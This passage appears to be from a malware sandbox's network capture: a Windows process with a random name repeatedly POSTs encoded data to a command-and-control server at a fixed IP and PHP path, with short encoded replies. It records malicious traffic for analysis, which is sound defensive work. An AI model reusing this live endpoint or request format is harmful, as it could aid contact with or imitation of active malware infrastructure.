                                                Dec 5, 2024 16:02:56.096652985 CET | 1452 | OUT | Data Raw: 50 57 5f 5b 5e 5b 51 5e 5e 5e 51 57 50 52 5a 5d 59 50 58 46 5b 51 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PW_[^[Q^^^QWPRZ]YPXF[QRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*%'!"'+*,Y>%/=936?>1'?(8Y0=)T?!Y""Z)
                                                Dec 5, 2024 16:02:57.087403059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:57.320502043 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:56 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 34 3e 2a 12 22 29 34 0c 2d 2e 3c 13 30 30 31 1c 27 20 3b 02 26 2d 1b 50 27 28 3f 53 36 05 2b 5b 35 07 27 5c 23 01 2b 12 24 27 28 46 0c 1d 21 07 24 01 3a 0d 2a 5f 2f 0e 2c 05 2d 40 29 0a 3a 5b 2e 10 36 16 3e 0d 00 0e 3c 3a 3e 1c 32 01 3c 59 24 3a 07 06 3f 30 30 01 26 25 20 53 00 14 26 0c 3d 57 3a 0b 3e 11 29 5a 21 3f 3b 09 3c 3b 2d 02 31 3b 2e 12 26 27 20 01 26 3a 24 52 23 51 23 55 2b 2e 00 59 31 12 0e 5d 2a 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y4>*")4-.<001' ;&-P'(?S6+[5'\#+$'(F!$:*_/,-@):[.6><:>2<Y$:?00&% S&=W:>)Z!?;<;-1;.&' &:$R#Q#U+.Y1]*#&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                26 | 192.168.2.7 | 49833 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:55.873297930 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2552
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:56.221597910 CET | 2552 | OUT | Data Raw: 55 54 5a 5d 5e 51 51 59 5e 5e 51 57 50 5a 5a 59 59 55 58 42 5b 5e 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UTZ]^QQY^^QWPZZYYUXB[^R\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^=?_3?>4Q4*<>%8Y=;5?+T(1+[(?3.*?!Y""Z)!
                                                Dec 5, 2024 16:02:57.202172995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:57.436803102 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:56 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                27 | 192.168.2.7 | 49839 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:57.683260918 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:58.034343004 CET | 2564 | OUT | Data Raw: 50 51 5f 58 5b 58 54 5a 5e 5e 51 57 50 52 5a 5a 59 55 58 49 5b 55 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQ_X[XTZ^^QWPRZZYUXI[URY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:).X3/>7#>($Y<#>)(5?W(2/_(+3$-!R?!Y""Z)
                                                Dec 5, 2024 16:02:59.011532068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:59.244884968 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:58 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                28 | 192.168.2.7 | 49844 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:59.479588032 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:59.830981970 CET | 2564 | OUT | Data Raw: 50 50 5a 58 5e 5b 51 5f 5e 5e 51 57 50 5e 5a 5b 59 55 58 46 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PPZX^[Q_^^QWP^Z[YUXF[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9])?$/P '+*;;>&;*)3_6Y(("3?+0\$="(?!Y""Z)5
                                                Dec 5, 2024 16:03:00.800514936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:01.036755085 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:00 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                29 | 192.168.2.7 | 49850 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:01.277158976 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:01.627890110 CET | 2564 | OUT | Data Raw: 50 54 5a 5a 5e 51 54 5b 5e 5e 51 57 50 5e 5a 5a 59 5d 58 44 5b 56 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PTZZ^QT[^^QWP^ZZY]XD[VRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)?*\3<=U4Q4\)0^>5 ):(!/><*+#'=)?!Y""Z)5


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                30 | 192.168.2.7 | 49853 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:02.452593088 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:02.799791098 CET | 1452 | OUT | Data Raw: 55 52 5f 5e 5e 5d 51 58 5e 5e 51 57 50 5d 5a 59 59 5c 58 48 5b 53 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UR_^^]QX^^QWP]ZYY\XH[SRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_)?%3?44?='<5))6R*#?8<\3=(/!Y""Z)
                                                Dec 5, 2024 16:03:03.770684958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:04.004196882 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 37 3e 2e 5f 22 39 33 57 2d 58 3c 11 25 30 21 18 26 55 27 04 32 3d 21 56 26 2b 23 51 36 28 2c 06 22 5f 20 05 34 3f 3f 58 27 1d 28 46 0c 1d 22 12 33 01 2d 56 2a 17 02 1c 2c 2f 2d 05 3e 0d 3e 59 2d 58 22 53 3d 20 3d 1c 3f 3a 39 0f 31 5e 30 58 24 29 39 07 3c 20 34 07 27 35 20 53 00 14 26 0d 2a 32 35 1e 3e 01 29 10 35 05 20 56 3c 2b 0f 07 32 05 3e 1d 25 1a 01 5c 27 29 3c 55 22 37 27 1f 2b 3e 2a 13 26 3c 3c 5b 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y7>._"93W-X<%0!&U'2=!V&+#Q6(,"_ 4??X'(F"3-V*,/->>Y-X"S= =?:91^0X$)9< 4'5 S&*25>)5 V<+2>%\')<U"7'+>*&<<[=#&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                31 | 192.168.2.7 | 49854 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:02.575346947 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:02.924726963 CET | 2564 | OUT | Data Raw: 55 53 5a 5d 5e 5d 51 58 5e 5e 51 57 50 5f 5a 50 59 52 58 42 5b 53 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZ]^]QX^^QWP_ZPYRXB[SRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:>/6'?"#4+=]'(%4Z=;^"Y8(!7X(8&-=?/!Y""Z)1
                                                Dec 5, 2024 16:03:03.897723913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:04.132088900 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                32 | 192.168.2.7 | 49860 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:04.392101049 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:04.739388943 CET | 2564 | OUT | Data Raw: 55 52 5f 5e 5e 58 54 59 5e 5e 51 57 50 5e 5a 51 59 52 58 42 5b 50 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UR_^^XTY^^QWP^ZQYRXB[PR\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^*>'<:47$=;+?))8!;V(2<(^;0=)(/!Y""Z)5
                                                Dec 5, 2024 16:03:05.688854933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:05.924319983 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:05 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                33 | 192.168.2.7 | 49862 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:06.170113087 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:06.518497944 CET | 2564 | OUT | Data Raw: 55 51 5a 58 5b 58 51 5e 5e 5e 51 57 50 5b 5a 50 59 52 58 48 5b 57 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQZX[XQ^^^QWP[ZPYRXH[WRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^+<)&/9U40>/<68=0"/*2<*;<$-2+?!Y""Z)!
                                                Dec 5, 2024 16:03:07.550662994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:07.784403086 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:07 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                34 | 192.168.2.7 | 49867 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:08.027326107 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:08.378076077 CET | 2564 | OUT | Data Raw: 50 52 5a 5b 5e 58 54 53 5e 5e 51 57 50 52 5a 5e 59 56 58 40 5b 55 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZ[^XTS^^QWPRZ^YVX@[URY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)<2^')T#^)80?%*)X6?#>3<'09?!Y""Z)


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                35 | 192.168.2.7 | 49873 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:09.142648935 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1412
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:09.487966061 CET | 1412 | OUT | Data Raw: 50 52 5a 5b 5b 58 51 5d 5e 5e 51 57 50 5a 5a 58 59 56 58 45 5b 57 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZ[[XQ]^^QWPZZXYVXE[WRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y+/_&,%4 Y)+<5+*7Y <7T=!((8 &>5+?!Y""Z)!
                                                Dec 5, 2024 16:03:10.461905956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:10.696468115 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:10 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 12 23 5b 3d 00 20 14 06 0d 39 2d 3b 02 24 20 08 43 26 0a 28 5d 27 3d 25 12 32 2b 38 0b 21 3b 3b 15 36 39 37 15 34 01 34 05 26 37 28 46 0c 1d 22 12 24 2b 31 1d 3e 39 24 50 2d 2c 39 46 28 23 2a 59 2e 00 0c 18 2a 23 2e 0d 2b 29 04 56 31 3b 33 01 26 29 2e 17 29 33 3b 1c 24 1f 20 53 00 14 26 08 2b 21 39 57 28 3c 3d 58 22 02 3b 0c 3c 3b 08 1d 25 38 31 0f 27 37 3f 5f 26 00 23 0d 20 19 24 0c 3e 2d 22 10 32 02 0e 5c 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: #[= 9-;$ C&(]'=%2+8!;;69744&7(F"$+1>9$P-,9F(#*Y.*#.+)V1;3&).)3;$ S&+!9W(<=X";<;%81'7?_&# $>-"2\=#&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                36 | 192.168.2.7 | 49874 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:09.262667894 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:09.612545967 CET | 2564 | OUT | Data Raw: 55 56 5f 5c 5e 58 51 5e 5e 5e 51 57 50 52 5a 58 59 55 58 44 5b 56 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UV_\^XQ^^^QWPRZXYUXD[VR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9>!0.##*8 Y??>9+["<8(1X?8+$"??!Y""Z)
                                                Dec 5, 2024 16:03:10.588311911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:10.820540905 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:10 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                37 | 192.168.2.7 | 49879 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:11.069931030 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
